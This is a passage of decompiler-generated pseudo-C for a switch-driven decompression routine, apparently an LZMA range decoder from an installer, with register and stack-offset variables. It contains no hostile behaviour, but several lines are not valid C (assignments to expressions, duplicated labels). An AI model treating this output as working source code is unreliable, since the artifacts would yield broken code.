                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            												__ecx =  *(__ebp - 4);
                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												if( *(__ebp - 0x38) >= 4) {
                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                            														_t98 = __ebp - 0x38;
                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                            														__eflags =  *_t98;
                                                            													} else {
                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            													}
                                                            												} else {
                                                            													 *(__ebp - 0x38) = 0;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                            												if( *(__ebp - 0x34) == __edx) {
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													goto L61;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__ecx =  *(__ebp - 8);
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            													goto L41;
                                                            												}
                                                            											case 7:
                                                            												__eflags =  *(__ebp - 0x40) - 1;
                                                            												if( *(__ebp - 0x40) != 1) {
                                                            													__eax =  *(__ebp - 0x24);
                                                            													 *(__ebp - 0x80) = 0x16;
                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            													__eax =  *(__ebp - 0x28);
                                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            													__eax =  *(__ebp - 0x2c);
                                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            													__eax = 0;
                                                            													__eflags =  *(__ebp - 0x38) - 7;
                                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            													__al = __al & 0x000000fd;
                                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x664;
                                                            													__eflags = __eax;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													goto L69;
                                                            												}
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 8;
                                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											case 8:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x84) = 0xa;
                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x38);
                                                            													__ecx =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                            													 *(__ebp - 0x84) = 9;
                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            												}
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											case 9:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													goto L89;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x60);
                                                            												if( *(__ebp - 0x60) == 0) {
                                                            													goto L171;
                                                            												}
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                            												__eflags = _t259;
                                                            												0 | _t259 = _t259 + _t259 + 9;
                                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                            												goto L76;
                                                            											case 0xa:
                                                            												goto L0;
                                                            											case 0xb:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__ecx =  *(__ebp - 0x24);
                                                            													__eax =  *(__ebp - 0x20);
                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x24);
                                                            												}
                                                            												__ecx =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												goto L88;
                                                            											case 0xc:
                                                            												L99:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xc;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t334 = __ebp - 0x70;
                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t334;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												goto L101;
                                                            											case 0xd:
                                                            												L37:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xd;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t122 = __ebp - 0x70;
                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t122;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L39:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            													goto L48;
                                                            												}
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													goto L54;
                                                            												}
                                                            												L41:
                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            												 *(__ebp - 0x48) = __eax;
                                                            												__eax = __eax + 1;
                                                            												__eax = __eax << 8;
                                                            												__eax = __eax + __ebx;
                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edx = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													 *(__ebp - 0x40) = 1;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													__ebx = __ebx + __ebx + 1;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edx;
                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L39;
                                                            												} else {
                                                            													goto L37;
                                                            												}
                                                            											case 0xe:
                                                            												L46:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xe;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t156 = __ebp - 0x70;
                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t156;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												while(1) {
                                                            													L48:
                                                            													__eflags = __ebx - 0x100;
                                                            													if(__ebx >= 0x100) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__edx = __ebx + __ebx;
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													__esi = __edx + __eax;
                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            													__ax =  *__esi;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__edi = __ax & 0x0000ffff;
                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            														__cx = __ax;
                                                            														_t170 = __edx + 1; // 0x1
                                                            														__ebx = _t170;
                                                            														__cx = __ax >> 5;
                                                            														__eflags = __eax;
                                                            														 *__esi = __ax;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __ecx;
                                                            														0x800 = 0x800 - __edi;
                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            														__ebx = __ebx + __ebx;
                                                            														 *__esi = __cx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														continue;
                                                            													} else {
                                                            														goto L46;
                                                            													}
                                                            												}
                                                            												L54:
                                                            												_t173 = __ebp - 0x34;
                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            												__eflags =  *_t173;
                                                            												goto L55;
                                                            											case 0xf:
                                                            												L58:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xf;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t203 = __ebp - 0x70;
                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t203;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L60:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													L55:
                                                            													__al =  *(__ebp - 0x44);
                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            													goto L56;
                                                            												}
                                                            												L61:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t217 = __edx + 1; // 0x1
                                                            													__ebx = _t217;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L60;
                                                            												} else {
                                                            													goto L58;
                                                            												}
                                                            											case 0x10:
                                                            												L109:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x10;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t365 = __ebp - 0x70;
                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t365;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												goto L111;
                                                            											case 0x11:
                                                            												goto L69;
                                                            											case 0x12:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 0x58);
                                                            													 *(__ebp - 0x84) = 0x13;
                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t613 - 0x54) = _t606;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												__eflags = __eax;
                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            												goto L130;
                                                            											case 0x13:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													_t469 = __ebp - 0x58;
                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            													__eflags =  *_t469;
                                                            													 *(__ebp - 0x30) = 0x10;
                                                            													 *(__ebp - 0x40) = 8;
                                                            													L144:
                                                            													 *(__ebp - 0x7c) = 0x14;
                                                            													goto L145;
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												 *(__ebp - 0x30) = 8;
                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            												L130:
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												 *(__ebp - 0x40) = 3;
                                                            												goto L144;
                                                            											case 0x14:
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            												__eax =  *(__ebp - 0x80);
                                                            												 *(_t613 - 0x88) = _t533;
                                                            												goto L1;
                                                            											case 0x15:
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            												goto L120;
                                                            											case 0x16:
                                                            												__eax =  *(__ebp - 0x30);
                                                            												__eflags = __eax - 4;
                                                            												if(__eax >= 4) {
                                                            													_push(3);
                                                            													_pop(__eax);
                                                            												}
                                                            												__ecx =  *(__ebp - 4);
                                                            												 *(__ebp - 0x40) = 6;
                                                            												__eax = __eax << 7;
                                                            												 *(__ebp - 0x7c) = 0x19;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L145;
                                                            											case 0x17:
                                                            												L145:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												 *(__ebp - 0x50) = 1;
                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            												goto L149;
                                                            											case 0x18:
                                                            												L146:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x18;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t484 = __ebp - 0x70;
                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t484;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L148:
                                                            												_t487 = __ebp - 0x48;
                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                            												__eflags =  *_t487;
                                                            												L149:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__ecx =  *(__ebp - 0x40);
                                                            													__ebx =  *(__ebp - 0x50);
                                                            													0 = 1;
                                                            													__eax = 1 << __cl;
                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            													__eax =  *(__ebp - 0x7c);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													while(1) {
                                                            														 *(_t613 - 0x88) = _t533;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x50);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__esi = __edx + __eax;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__ax =  *__esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													__cx = __ax >> 5;
                                                            													__eax = __eax - __ecx;
                                                            													__edx = __edx + 1;
                                                            													__eflags = __edx;
                                                            													 *__esi = __ax;
                                                            													 *(__ebp - 0x50) = __edx;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L148;
                                                            												} else {
                                                            													goto L146;
                                                            												}
                                                            											case 0x19:
                                                            												__eflags = __ebx - 4;
                                                            												if(__ebx < 4) {
                                                            													 *(__ebp - 0x2c) = __ebx;
                                                            													L119:
                                                            													_t393 = __ebp - 0x2c;
                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            													__eflags =  *_t393;
                                                            													L120:
                                                            													__eax =  *(__ebp - 0x2c);
                                                            													__eflags = __eax;
                                                            													if(__eax == 0) {
                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            														goto L170;
                                                            													}
                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                            														goto L171;
                                                            													}
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            													__eax =  *(__ebp - 0x30);
                                                            													_t400 = __ebp - 0x60;
                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            													__eflags =  *_t400;
                                                            													goto L123;
                                                            												}
                                                            												__ecx = __ebx;
                                                            												__eax = __ebx;
                                                            												__ecx = __ebx >> 1;
                                                            												__eax = __ebx & 0x00000001;
                                                            												__ecx = (__ebx >> 1) - 1;
                                                            												__al = __al | 0x00000002;
                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                            												__eflags = __ebx - 0xe;
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												if(__ebx >= 0xe) {
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x48) = __ecx;
                                                            													L102:
                                                            													__eflags =  *(__ebp - 0x48);
                                                            													if( *(__ebp - 0x48) <= 0) {
                                                            														__eax = __eax + __ebx;
                                                            														 *(__ebp - 0x40) = 4;
                                                            														 *(__ebp - 0x2c) = __eax;
                                                            														__eax =  *(__ebp - 4);
                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                            														__eflags = __eax;
                                                            														L108:
                                                            														__ebx = 0;
                                                            														 *(__ebp - 0x58) = __eax;
                                                            														 *(__ebp - 0x50) = 1;
                                                            														 *(__ebp - 0x44) = 0;
                                                            														 *(__ebp - 0x48) = 0;
                                                            														L112:
                                                            														__eax =  *(__ebp - 0x40);
                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            															_t391 = __ebp - 0x2c;
                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            															__eflags =  *_t391;
                                                            															goto L119;
                                                            														}
                                                            														__eax =  *(__ebp - 0x50);
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            														__eax =  *(__ebp - 0x58);
                                                            														__esi = __edi + __eax;
                                                            														 *(__ebp - 0x54) = __esi;
                                                            														__ax =  *__esi;
                                                            														__ecx = __ax & 0x0000ffff;
                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                            															__ecx = 0;
                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            															__ecx = 1;
                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            															__ebx = 1;
                                                            															__ecx =  *(__ebp - 0x48);
                                                            															__ebx = 1 << __cl;
                                                            															__ecx = 1 << __cl;
                                                            															__ebx =  *(__ebp - 0x44);
                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                            															__cx = __ax;
                                                            															__cx = __ax >> 5;
                                                            															__eax = __eax - __ecx;
                                                            															__edi = __edi + 1;
                                                            															__eflags = __edi;
                                                            															 *(__ebp - 0x44) = __ebx;
                                                            															 *__esi = __ax;
                                                            															 *(__ebp - 0x50) = __edi;
                                                            														} else {
                                                            															 *(__ebp - 0x10) = __edx;
                                                            															0x800 = 0x800 - __ecx;
                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            															 *__esi = __dx;
                                                            														}
                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                            															L111:
                                                            															_t368 = __ebp - 0x48;
                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                            															__eflags =  *_t368;
                                                            															goto L112;
                                                            														} else {
                                                            															goto L109;
                                                            														}
                                                            													}
                                                            													__ecx =  *(__ebp - 0xc);
                                                            													__ebx = __ebx + __ebx;
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            														__ecx =  *(__ebp - 0x10);
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            														__ebx = __ebx | 0x00000001;
                                                            														__eflags = __ebx;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L101:
                                                            														_t338 = __ebp - 0x48;
                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                            														__eflags =  *_t338;
                                                            														goto L102;
                                                            													} else {
                                                            														goto L99;
                                                            													}
                                                            												}
                                                            												__edx =  *(__ebp - 4);
                                                            												__eax = __eax - __ebx;
                                                            												 *(__ebp - 0x40) = __ecx;
                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            												goto L108;
                                                            											case 0x1a:
                                                            												L56:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1a;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x68);
                                                            												__al =  *(__ebp - 0x5c);
                                                            												__edx =  *(__ebp - 8);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *( *(__ebp - 0x68)) = __al;
                                                            												__ecx =  *(__ebp - 0x14);
                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                            												__eax = __ecx + 1;
                                                            												__edx = 0;
                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t192;
                                                            												goto L80;
                                                            											case 0x1b:
